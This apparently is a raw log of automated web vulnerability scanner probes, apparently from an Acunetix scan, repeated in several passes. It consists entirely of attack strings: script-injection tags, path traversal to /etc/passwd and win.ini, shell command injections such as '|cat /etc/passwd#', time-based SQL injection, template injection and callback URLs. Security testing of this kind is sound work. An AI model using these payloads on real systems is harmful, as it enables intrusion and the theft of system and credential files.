'"()&%<ScRiPt >prompt(984233)</ScRiPt>

1

1

1

1_959152

1

WEB-INF\web.xml

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

acu5629\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5629

1

1

1

acux4870\xc0\xbez1\xc0\xbcz2a\x90bcxuca4870

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(961834)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<script>prompt(943279)</script>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(971376)</ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?978455></ScRiPt>

1

1

1<ScRiPt >prompt(918823)</ScRiPt>

response.write(9396101*9151425)

1

1

1

1

WEB-INF/web.xml

'+response.write(9396101*9151425)+'

1

1

1<video><source onerror="javascript:prompt(997463)">

&cat /etc/passwd&

1

"+response.write(9396101*9151425)+"

WEB-INF\web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(903899)"></g></svg>

1

'&cat /etc/passwd&'

1<div style=width:expression(prompt(965976))>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

cat /etc/passwd

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

1<body onload=prompt(995775)>

${100189+99420}

1

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1some_inexistent_file_with_long_name%00.jpg

1

1

|cat /etc/passwd#

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(903064)>

1&n904773=v911821

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

'|'ld

1<img src=xyz OnErRor=prompt(968718)>

)

-1)

testasp.vulnweb.com

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

!(()&&!|*|*|

'"()

"|"ld

1<img/src=">" onerror=alert(918466)>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1))

1

1<ScRiPt%20>prompt(951820)</sCripT>

'

1

^(#$!@#$)(()))******

1

voXvoLvZ'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1&lt

'

1

"

1

1

\xf6<img acu onmouseover=prompt(967807) //\xf6>

/etc/passwd

1

1

nfrYCAeh')

1

http://hitMpwlG1m76u.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

"

1

1<input autofocus onfocus=prompt(929080)>

1

1lKxeTUE'))

acunetix_wvs_invalid_filename

1

1

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

<a href='http://www.acunetix.com'>website security</a>

1

comments

-1

1

1

&dir

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

[url=http://www.acunetix.com]website security[/url]

http://www.acunetix.tst

comments

'"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1)

1_S5DuD <ScRiPt >prompt(986978)</ScRiPt>

1

1

'&dir&'

comments/.

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

<!--

"&dir&"

-1))

1

1

1'"()&%<ScRiPt >prompt(966085)</ScRiPt>

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

Mvy6b7cF'

1

|dir

1

1

1

'"()&%<ScRiPt >prompt(914507)</ScRiPt>

1

'|dir

1

1

m2WdnC2S')

1

1

1_981058

file:///etc/passwd

1

"|dir

98pP3p6h'))

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

acu1684\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1684

1

../../../../../../../../../../windows/win.ini.jpg

acux9440\xc0\xbez1\xc0\xbcz2a\x90bcxuca9440

1

1

1<ScRiPt >prompt(999868)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<script>prompt(937841)</script>

................windowswin.ini

1

1

1

response.write(9493634*9853632)

1<ScRiPt >prompt(919098)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

'+response.write(9493634*9853632)+'

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?910989></ScRiPt>

1

1

"+response.write(9493634*9853632)+"

1

1

&cat /etc/passwd&

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(959414)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1<video><source onerror="javascript:prompt(925308)">

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(981984)"></g></svg>

WEB-INF/web.xml

../../../../../../../../../../etc/passwd.jpg

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

`cat /etc/passwd`

${99134+99064}

1<div style=width:expression(prompt(936555))>

1

if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/

1

WEB-INF\web.xml

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<iframe src='data:text/html

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1&n954350=v974310

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

1some_inexistent_file_with_long_name%00.jpg

'"()

1

1<body onload=prompt(989651)>

1

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(960830)>

^(#$!@#$)(()))******

-1)

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

1

-1))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1<img src=xyz OnErRor=prompt(904882)>

/etc/passwd

1

'

1

1

sXdyA7C5'

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

1

1<img/src=">" onerror=alert(941944)>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

Vg8aGa5V')

${@print(md5(acunetix_wvs_security_test))}

"

acunetix_wvs_invalid_filename

1

http://hitO8XYJVQDem.bxss.me/

1<ScRiPt%20>prompt(945085)</sCripT>

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

EsLJYHs6'))

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

comments

1

1

1&lt

1

&dir

-1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

http://www.acunetix.tst

-1)

1

\xf6<img acu onmouseover=prompt(994130) //\xf6>

'&dir&'

file:///etc/passwd

1

'"

-1))

"&dir&"

comments/.

1

1

1<input autofocus onfocus=prompt(980747)>

ffJfLF5V'

/\../\../\../\../\../\../\../etc/passwd

1

<!--

1'"()&%<ScRiPt >prompt(908444)</ScRiPt>

<a href='http://www.acunetix.com'>website security</a>

1

|dir

1

p14Fw0ot')

'"()&%<ScRiPt >prompt(960477)</ScRiPt>

1

1

WEB-INF/web.xml

AmelK4Jx'))

'|dir

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1_939331

WEB-INF\web.xml

"|dir

1

1

1_hQDcY <ScRiPt >prompt(990205)</ScRiPt>

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acu7117\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7117

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acux3845\xc0\xbez1\xc0\xbcz2a\x90bcxuca3845

1

1

................windowswin.ini

1<ScRiPt >prompt(917248)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(939329)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(926486)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?990083></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<ScRiPt >prompt(951913)</ScRiPt>

1

response.write(9716636*9010080)

1

1

WEB-INF/web.xml

1

'+response.write(9716636*9010080)+'

1<video><source onerror="javascript:prompt(930415)">

1

1

WEB-INF\web.xml

"+response.write(9716636*9010080)+"

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(978182)"></g></svg>

1

SomeCustomInjectedHeader:injected_by_wvs

1

&cat /etc/passwd&

1

1

1

1

../../../../../../../../../../etc/passwd

1<div style=width:expression(prompt(927368))>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1<body onload=prompt(906059)>

../../../../../../../../../../etc/passwd.jpg

"&cat /etc/passwd&"

1

-1

${99085+100323}

1

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(958892)>

-1)

cat /etc/passwd

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img src=xyz OnErRor=prompt(947169)>

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1&n964619=v943037

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1<img/src=">" onerror=alert(960249)>

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

|cat /etc/passwd#

aHnbM67U'

1

)

1

1<ScRiPt%20>prompt(927409)</sCripT>

1some_inexistent_file_with_long_name%00.jpg

'|'ld

iEvP9fMK')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'"()

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

!(()&&!|*|*|

1&lt

/etc/passwd

BSy0TZNx'))

"|"ld

'

1

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

testasp.vulnweb.com

\xf6<img acu onmouseover=prompt(947927) //\xf6>

1

"

-1

1

1

1<input autofocus onfocus=prompt(908656)>

1

1

1

'

-1)

${@print(md5(acunetix_wvs_security_test))}

1

http://hitq2lJSUv5bq.bxss.me/

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

<a href='http://www.acunetix.com'>website security</a>

"

1

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

1

ZURrrOxJ'

||cat /etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

1

&dir

1_fslKy <ScRiPt >prompt(926544)</ScRiPt>

pZ2uI5ap')

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

1

1

1

XthKkhum'))

'&dir&'

1

comments/.

1

1

'"

1

file:///etc/passwd

"&dir&"

1

1

1

1'"()&%<ScRiPt >prompt(925823)</ScRiPt>

1

<!--

1

|dir

'"()&%<ScRiPt >prompt(961579)</ScRiPt>

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

'|dir

1_964133

1

1

1

1

"|dir

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acu7160\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7160

1

................windowswin.ini

1

acux3990\xc0\xbez1\xc0\xbcz2a\x90bcxuca3990

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(954686)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<script>prompt(957590)</script>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

response.write(9356639*9852829)

1

1<ScRiPt >prompt(904963)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9356639*9852829)+'

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?906153></ScRiPt>

"+response.write(9356639*9852829)+"

1

&cat /etc/passwd&

1

1

1<ScRiPt >prompt(932728)</ScRiPt>

'&cat /etc/passwd&'

1

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1<video><source onerror="javascript:prompt(991302)">

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(902291)"></g></svg>

WEB-INF\web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

${100381+99737}

cat /etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n939863=v943664

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<div style=width:expression(prompt(965866))>

1

1some_inexistent_file_with_long_name%00.jpg

`cat /etc/passwd`

1

1

1<iframe src='data:text/html

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

1

1

|cat /etc/passwd#

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1)

1<body onload=prompt(907786)>

!(()&&!|*|*|

1

'|'ld

1

testasp.vulnweb.com

'"()

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(948416)>

1

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

1

1

^(#$!@#$)(()))******

EI3VDg9P'

1

1

1<img src=xyz OnErRor=prompt(943739)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

BrhwcT6p')

'

1<img/src=">" onerror=alert(958442)>

/etc/passwd

1

1

VORSIRa4'))

1

1

1

"

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<ScRiPt%20>prompt(991853)</sCripT>

1

1

http://hitVlh7TMHucX.bxss.me/

-1

1

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1&lt

acunetix_wvs_invalid_filename

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1)

&dir

1

1

comments

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

\xf6<img acu onmouseover=prompt(961962) //\xf6>

1

http://www.acunetix.tst

-1))

1

'&dir&'

1

1

1<input autofocus onfocus=prompt(925030)>

comments

'"

file:///etc/passwd

1'"()&%<ScRiPt >prompt(903545)</ScRiPt>

7jzH39Jc'

1

<a href='http://www.acunetix.com'>website security</a>

1

1

<!--

comments/.

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

'"()&%<ScRiPt >prompt(992848)</ScRiPt>

3URCoPDK')

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

aAQscbqD'))

|dir

WEB-INF/web.xml

1_918470

1

1

1

1_CYmoq <ScRiPt >prompt(977644)</ScRiPt>

1

WEB-INF\web.xml

'|dir

1

1

1

1

"|dir

../../../../../../../../../../windows/win.ini

1

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acu10679\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10679

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux4771\xc0\xbez1\xc0\xbcz2a\x90bcxuca4771

1

1

................windowswin.ini

1

1<ScRiPt >prompt(941876)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(916989)</script>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(945283)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?957415></ScRiPt>

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(978245)</ScRiPt>

1

1

1

1

1<video><source onerror="javascript:prompt(918287)">

1

WEB-INF/web.xml

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(950882)"></g></svg>

1

1

1<div style=width:expression(prompt(904527))>

1

WEB-INF\web.xml

1<iframe src='data:text/html

1

1

1<body onload=prompt(938753)>

1

1

response.write(9961342*9194608)

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(980857)>

1

1

1

'+response.write(9961342*9194608)+'

1

1<img src=xyz OnErRor=prompt(907876)>

1

&cat /etc/passwd&

1

1

"+response.write(9961342*9194608)+"

1<img/src=">" onerror=alert(928158)>

1

1

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1<ScRiPt%20>prompt(979396)</sCripT>

1

1

1

"&cat /etc/passwd&"

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&lt

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

\xf6<img acu onmouseover=prompt(914192) //\xf6>

${99198+100389}

1

`cat /etc/passwd`

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1<input autofocus onfocus=prompt(929596)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

1&n905954=v936909

1

-1

<a href='http://www.acunetix.com'>website security</a>

)

1

1

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

[url=http://www.acunetix.com]website security[/url]

1

-1)

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

testasp.vulnweb.com

-1))

^(#$!@#$)(()))******

1_taIkE <ScRiPt >prompt(910107)</ScRiPt>

1

'"()

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'

1

UKjjTNF8'

1

1

/etc/passwd

1

'

1

xjiJRCSf')

1

"

1

1

1

"

1

1

nAHKQYoO'))

1

${@print(md5(acunetix_wvs_security_test))}

1

-1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

http://hit9JCZqjmWUQ.bxss.me/

-1)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

&dir

acunetix_wvs_invalid_filename

1

http://www.acunetix.tst

-1))

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

1

comments

'&dir&'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

78xUkvic'

1

1

'"

1'"()&%<ScRiPt >prompt(978167)</ScRiPt>

1

"&dir&"

h2vj8Pju')

comments

1

'"()&%<ScRiPt >prompt(977911)</ScRiPt>

1

<!--

|dir

comments/.

onYIj0PI'))

1

1_938364

1

file:///etc/passwd

1

'|dir

1

1

1

/\../\../\../\../\../\../\../etc/passwd

"|dir

1

1

1

1

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

acu9795\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9795

1

1

../../../../../../../../../../boot.ini

acux7939\xc0\xbez1\xc0\xbcz2a\x90bcxuca7939

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(933848)</ScRiPt>

1

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(917074)</script>

1

1

1

1<ScRiPt >prompt(956306)</ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?926495></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

response.write(9458849*9959289)

1

1<ScRiPt >prompt(997377)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

'+response.write(9458849*9959289)+'

&cat /etc/passwd&

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(972104)">

"+response.write(9458849*9959289)+"

1

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(948448)"></g></svg>

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

1<div style=width:expression(prompt(942714))>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

1

WEB-INF/web.xml

${100260+100143}

1<iframe src='data:text/html

`cat /etc/passwd`

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1<body onload=prompt(930250)>

WEB-INF\web.xml

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n974947=v947936

1

|cat /etc/passwd#

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

1

)

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(936044)>

1

1

-1)

'|'ld

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(990752)>

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

1

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

1

^(#$!@#$)(()))******

1<img/src=">" onerror=alert(946817)>

'"()

1

SvYWJDLx'

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt%20>prompt(902958)</sCripT>

1

1

1

1

YpoGiaBn')

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

'

1

1

1

1&lt

1

"

1

zEnlUiHM'))

${@print(md5(acunetix_wvs_security_test))}

1

1

1

\xf6<img acu onmouseover=prompt(978430) //\xf6>

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

-1

http://hitqsvbYdepYI.bxss.me/

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

acunetix_wvs_invalid_filename

1

1<input autofocus onfocus=prompt(956929)>

1

1

&dir

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

comments

-1)

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

<a href='http://www.acunetix.com'>website security</a>

1

1

-1))

